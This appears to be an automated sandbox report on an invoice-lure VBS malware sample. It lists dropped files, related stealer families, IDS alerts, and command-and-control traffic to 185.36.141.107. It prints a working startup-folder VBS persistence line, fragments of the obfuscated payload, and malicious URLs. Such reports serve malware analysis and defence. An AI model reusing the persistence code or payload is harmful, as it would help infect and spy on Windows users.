Overall analysis duration:	0h 9m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Fattura-24SC-99245969925904728562.vbs
Detection:	MAL
Classification:	mal100.bank.troj.spyw.expl.evad.winVBS@18/10@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 90% Number of executed functions: 588 Number of non-executed functions: 14
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Fattura-24SC-99245969925904728562.vbs

Simulations

Behavior and APIs

Time	Type	Description
09:16:09	API Interceptor	16x Sleep call for process: Fattura-24SC-99245969925904728562.vbs.exe modified
09:16:13	API Interceptor	98x Sleep call for process: InstallUtil.exe modified
11:14:10	API Interceptor	14x Sleep call for process: OSDescription.vbs.exe modified
14:16:12	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-DBNETZDE	ZRemI0ixC6.dll	Get hash	malicious	BumbleBee	Browse	185.36.140.112
	PWzQpJQHzb.msi	Get hash	malicious	Unknown	Browse	185.36.140.112
	Q6yuW8YIMR.dll	Get hash	malicious	BumbleBee	Browse	185.36.140.112
	7rbJdaTZe2.dll	Get hash	malicious	BumbleBee	Browse	185.36.140.112
	1JYlOOKImO.dll	Get hash	malicious	BumbleBee	Browse	185.36.140.112
	bGvIeUxVdy.msi	Get hash	malicious	Unknown	Browse	185.36.140.112
	QsLhL1pw3t.msi	Get hash	malicious	Unknown	Browse	185.36.140.112
	https://mariculturasalinas.com/za/zap/enter.php	Get hash	malicious	Unknown	Browse	185.36.141.52
	http://mxi.fr/json/upload/dkjxff.php?lfitf5p	Get hash	malicious	Unknown	Browse	185.36.140.14
	Rechnung-62671596778856538170.vbs	Get hash	malicious	PureLog Stealer	Browse	185.36.141.52

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	ilZhNx3JAc.bat	Get hash	malicious	AgentTesla	Browse
	87M9Y3P4Z7.bat	Get hash	malicious	AgentTesla	Browse
	ip4.cmd	Get hash	malicious	Unknown	Browse
	https://mariculturasalinas.com/za/zap/enter.php	Get hash	malicious	Unknown	Browse
	849128312.cmd	Get hash	malicious	Unknown	Browse
	Tracking#1Z379W410424496200.vbs	Get hash	malicious	AgentTesla	Browse
	Rechnung0192839182.pdf	Get hash	malicious	Unknown	Browse
	Rechnung-62671596778856538170.vbs	Get hash	malicious	PureLog Stealer	Browse
	Original Invoice.vbs	Get hash	malicious	Unknown	Browse
	FQ____RM quotation_JPEG IMAGE.img_WhatsApp.BZ2.vbs	Get hash	malicious	Unknown	Browse
C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	ilZhNx3JAc.bat	Get hash	malicious	AgentTesla	Browse
	87M9Y3P4Z7.bat	Get hash	malicious	AgentTesla	Browse
	ip4.cmd	Get hash	malicious	Unknown	Browse
	https://mariculturasalinas.com/za/zap/enter.php	Get hash	malicious	Unknown	Browse
	849128312.cmd	Get hash	malicious	Unknown	Browse
	Tracking#1Z379W410424496200.vbs	Get hash	malicious	AgentTesla	Browse
	Rechnung0192839182.pdf	Get hash	malicious	Unknown	Browse
	Rechnung-62671596778856538170.vbs	Get hash	malicious	PureLog Stealer	Browse
	Original Invoice.vbs	Get hash	malicious	Unknown	Browse
	FQ____RM quotation_JPEG IMAGE.img_WhatsApp.BZ2.vbs	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1434
Entropy (8bit):	5.342612360333169
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhRAE4KzecKIE4oKNzKoZsXE4qdKqE4Kx1qE4TE4KmJE4j:MxHKlYHKh3oRAHKzectHo60H8HKx1qHd
MD5:	DED544725C0FC4A9C1A4064260007227
SHA1:	C196627F0D20E14F0240201AC995E9BEBC399C29
SHA-256:	82F1B25C0D0DC1B72BFE5E837B668E0087D7E469CCCF909924B72FEC5C1C8F10
SHA-512:	41A800B36C9017CB5B9D427C9AD317ACAC680FCE5FF85391497F6BE489782423B7E22A27CD7211C2E110B5465418747841A42A16C40D1A41A0CD27D192F2A7A5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05eouqb0.jr2.ps1

Download File

Process:	C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nuhi4yi.ymc.psm1

Download File

Process:	C:\Users\user\AppData\Roaming\OSDescription.vbs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ch103yy.jim.ps1

Download File

Process:	C:\Users\user\AppData\Roaming\OSDescription.vbs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qlkpqgk.hpo.psm1

Download File

Process:	C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs

Download File

Process:	C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.816934446375552
Encrypted:	false
SSDEEP:	3:FER/n0eFHHo0nacwREaKC5Nht7E:FER/lFHIcNwiaZ5zC
MD5:	57F3B1F46DA67D431191E2916C64A2B3
SHA1:	65CA3FFDA07F0192D5940A3E49366F50A639C9DF
SHA-256:	7D7838910D3188CFD37791998298F50D8A62996CC32B96723F91A93F840B16FD
SHA-512:	5C762D4A0F54A1A2E36198E07F0474B171EF9E637CE1B41BD41BE3CAD5A647C1BFD77B730FB945FC0832BEF9B16C66B0CC6F3C8919FCC4B8C3896C2BD9A1FDE7
Malicious:	true
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\OSDescription.vbs"""

C:\Users\user\AppData\Roaming\OSDescription.vbs

Download File

Process:	C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	2500641
Entropy (8bit):	6.300678398180074
Encrypted:	false
SSDEEP:	49152:32D/zgSDcNXiU9R7xbG2Y8nWuanD/11Wr:5iUF
MD5:	6F5153972552FDC27D794087D11C0F12
SHA1:	2392E3FB23D622DD6EF791B388BD0ACADEF3F069
SHA-256:	577564CE2FACE042CCE2F1F7F2A28C42A96D08B3929E63497DA486FD90D295D0
SHA-512:	B94E7BD7BDEBCF9A6308118CCC0DF4A54091F0EC5F3D18F847107BA81A8F88C8288E76B259978848CF47C4019AB3395645F76B91B29BAD7EF8CEBA09436CA488
Malicious:	true
Preview:	REM +d6jS8KoNK9DhI9ldkMk4dDzN6elzGnFqa8wHcQqmd/L1mo3SkL5WaRCp+rhO+jss4mjTYRKji103aETeBfrGOuwmp/Y7ZaN+t4DYiV/5G3GQ2o7h0tbgEg9w22g5uGMV47+MKFIE8byFVOmRysH9Pg0TTSssJGfVBlXmyko7BP8dguXgLTLfTCkSHL3tTgcNc51bJms4Kf9X9yH8XicySk/qdEgcHREaM8ECGceqJ/gOmZas396UJZkmSHXQ4y3B35Jtwxn/MRaMQPJqNc/3rY8p7YSQRapxVk7u9ZSbCRCTAHo1fCTeT6hAIF7sKe+JLtqm5zWpcVnn/KzK0DuB8Xfh1zVVwjGqS14cEGVLRSxfJca6NCIbKY8gDX94E39svi8nClL6M2yo/JvXjWE0nLeAa6p0x/0Vhq1mdbSycnfer5I2JDqZpPJZ0TeGA5xuK7DHt6eU9/ZyEUPlU/34Nopj+N2O/ni9Job4GvaFT4MROEoD6rqQCbebhBK2tFE0odqtYkq+ny04CpDg3Nz/rIHA1Btz9AvPk68mMzplxnJ1g7jcF+04UpldC6Apr2zanBdQteA1wK3Onc6bmKvykgReq1lkI5TUyEGCFuhr5iRCS1ci1VBSP8LLDXoeXPntanlbiwPTtriCu+1es6nFYveqWQ0Uz/zzzGuWmNYa9muHlKxvEBsgbpSeoFmi84wYxepCdAOs2Jq8p/6YfR2iZ8VB1t79VlLcieq4tm9jURjfvZMrmEIoGvwR8qhciDG3PHiUIRytG29XpepZNGJrGValuP9Kdo9DWbwi66OqgAG4wXn2zy/8MmJjlDKXzyaZ5tlRts9yLIWpEMegim/L7SXooDLodAom6UZdJqJc60pVSMSKWMkyRpT0Tb5oW6gyV+bM727z8bKPKs1JFQXjDCV9CwGrAVQctlmd8+ZLvk3eKs67UDvboZcR+2476TFO0QGY61BmhxaS8DkVVf2MA2x/qup3J7wpoWm

C:\Users\user\AppData\Roaming\OSDescription.vbs.exe

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	5.502549953174867
Encrypted:	false
SSDEEP:	6144:MF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:95pGVcwW2KXzJ4pdd3klnnWosPhnzq
MD5:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
SHA1:	F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919
SHA-256:	73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
SHA-512:	6E43DCA1B92FAACE0C910CBF9308CF082A38DD39DA32375FAD72D6517DEA93E944B5E5464CF3C69A61EABF47B2A3E5AA014D6F24EFA1A379D4C81C32FA39DDBC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: ilZhNx3JAc.bat, Detection: malicious, Browse Filename: 87M9Y3P4Z7.bat, Detection: malicious, Browse Filename: ip4.cmd, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: 849128312.cmd, Detection: malicious, Browse Filename: Tracking#1Z379W410424496200.vbs, Detection: malicious, Browse Filename: Rechnung0192839182.pdf, Detection: malicious, Browse Filename: Rechnung-62671596778856538170.vbs, Detection: malicious, Browse Filename: Original Invoice.vbs, Detection: malicious, Browse Filename: FQ____RM quotation_JPEG IMAGE.img_WhatsApp.BZ2.vbs, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".z.fg..fg..fg..x5..dg..o...lg..r...eg..r...}g..fg...g..r...cg..r...og..r...ng..r..gg..r...gg..Richfg..........................PE..L...s/.0..........................................@......................................@...... ...........................".......0...}......................\|....I..T............................................ ...............................text...\........................... ..`.data...8...........................@....idata....... ......................@..@.rsrc....}...0...~..................@..@.reloc..\|...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\OSDescription.vbs:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	5.502549953174867
Encrypted:	false
SSDEEP:	6144:MF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:95pGVcwW2KXzJ4pdd3klnnWosPhnzq
MD5:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
SHA1:	F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919
SHA-256:	73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
SHA-512:	6E43DCA1B92FAACE0C910CBF9308CF082A38DD39DA32375FAD72D6517DEA93E944B5E5464CF3C69A61EABF47B2A3E5AA014D6F24EFA1A379D4C81C32FA39DDBC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: ilZhNx3JAc.bat, Detection: malicious, Browse Filename: 87M9Y3P4Z7.bat, Detection: malicious, Browse Filename: ip4.cmd, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: 849128312.cmd, Detection: malicious, Browse Filename: Tracking#1Z379W410424496200.vbs, Detection: malicious, Browse Filename: Rechnung0192839182.pdf, Detection: malicious, Browse Filename: Rechnung-62671596778856538170.vbs, Detection: malicious, Browse Filename: Original Invoice.vbs, Detection: malicious, Browse Filename: FQ____RM quotation_JPEG IMAGE.img_WhatsApp.BZ2.vbs, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".z.fg..fg..fg..x5..dg..o...lg..r...eg..r...}g..fg...g..r...cg..r...og..r...ng..r..gg..r...gg..Richfg..........................PE..L...s/.0..........................................@......................................@...... ...........................".......0...}......................\|....I..T............................................ ...............................text...\........................... ..`.data...8...........................@....idata....... ......................@..@.rsrc....}...0...~..................@..@.reloc..\|...........................@..B........................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (65536), with no line terminators
Entropy (8bit):	6.300678398180074
TrID:
File name:	Fattura-24SC-99245969925904728562.vbs
File size:	2'500'641 bytes
MD5:	6f5153972552fdc27d794087d11c0f12
SHA1:	2392e3fb23d622dd6ef791b388bd0acadef3f069
SHA256:	577564ce2face042cce2f1f7f2a28c42a96d08b3929e63497da486fd90d295d0
SHA512:	b94e7bd7bdebcf9a6308118ccc0df4a54091f0ec5f3d18f847107ba81a8f88c8288e76b259978848cf47c4019ab3395645f76b91b29bad7ef8ceba09436ca488
SSDEEP:	49152:32D/zgSDcNXiU9R7xbG2Y8nWuanD/11Wr:5iUF
TLSH:	11C501621E34DDC87398A4397EBC3650D3E0EEB76C7BD6205297EB5A1B2A9001720F71
File Content Preview:	REM +d6jS8KoNK9DhI9ldkMk4dDzN6elzGnFqa8wHcQqmd/L1mo3SkL5WaRCp+rhO+jss4mjTYRKji103aETeBfrGOuwmp/Y7ZaN+t4DYiV/5G3GQ2o7h0tbgEg9w22g5uGMV47+MKFIE8byFVOmRysH9Pg0TTSssJGfVBlXmyko7BP8dguXgLTLfTCkSHL3tTgcNc51bJms4Kf9X9yH8XicySk/qdEgcHREaM8ECGceqJ/gOmZas396UJZkmSH

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-31T14:16:23.610522+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.7	49740	TCP
2024-10-31T14:17:08.011978+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.7	49973	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 14:16:14.609589100 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:14.615664005 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:14.615751028 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:14.631408930 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:14.636415005 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:14.636471987 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:14.641988039 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.551362038 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.552174091 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.552223921 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.552270889 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.552285910 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.552305937 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.552315950 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.552326918 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.552330971 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.552376986 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.552542925 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.552555084 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.552565098 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.552591085 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.552614927 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.557249069 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.557280064 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.557508945 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.691860914 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.692014933 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.692135096 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.692504883 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.692569971 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.692583084 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.692630053 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.692698956 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.692751884 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.692780972 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.692794085 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.692836046 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.692898989 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.692912102 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.692969084 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.693562031 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.693607092 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.693619013 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.693664074 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.693980932 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.694099903 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.694370031 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.783515930 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.808011055 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.808032990 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.808049917 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.808073997 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.808109999 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.808120966 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.808149099 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.808191061 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.808257103 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.808720112 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.808763981 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.808777094 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.808779955 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.808815002 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.808954954 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.808967113 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.809009075 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.850703955 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.850738049 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.850753069 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.850815058 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.923333883 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.923362017 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.923372984 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.923438072 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.923466921 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.923479080 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.923491955 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.923515081 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.923902035 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.923953056 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.923959970 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.923970938 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.924052000 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.924068928 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.924082041 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.924144983 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.965985060 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.966006041 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.966017008 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.966084003 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.966255903 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:15.966315985 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:15.966404915 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.038784027 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.038837910 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.038851023 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.038867950 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.038903952 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.038908005 CET	49706	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:16.038916111 CET	7702	49706	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:16.038927078 CET	7702	49706	185.36.141.107	192.168.2.7
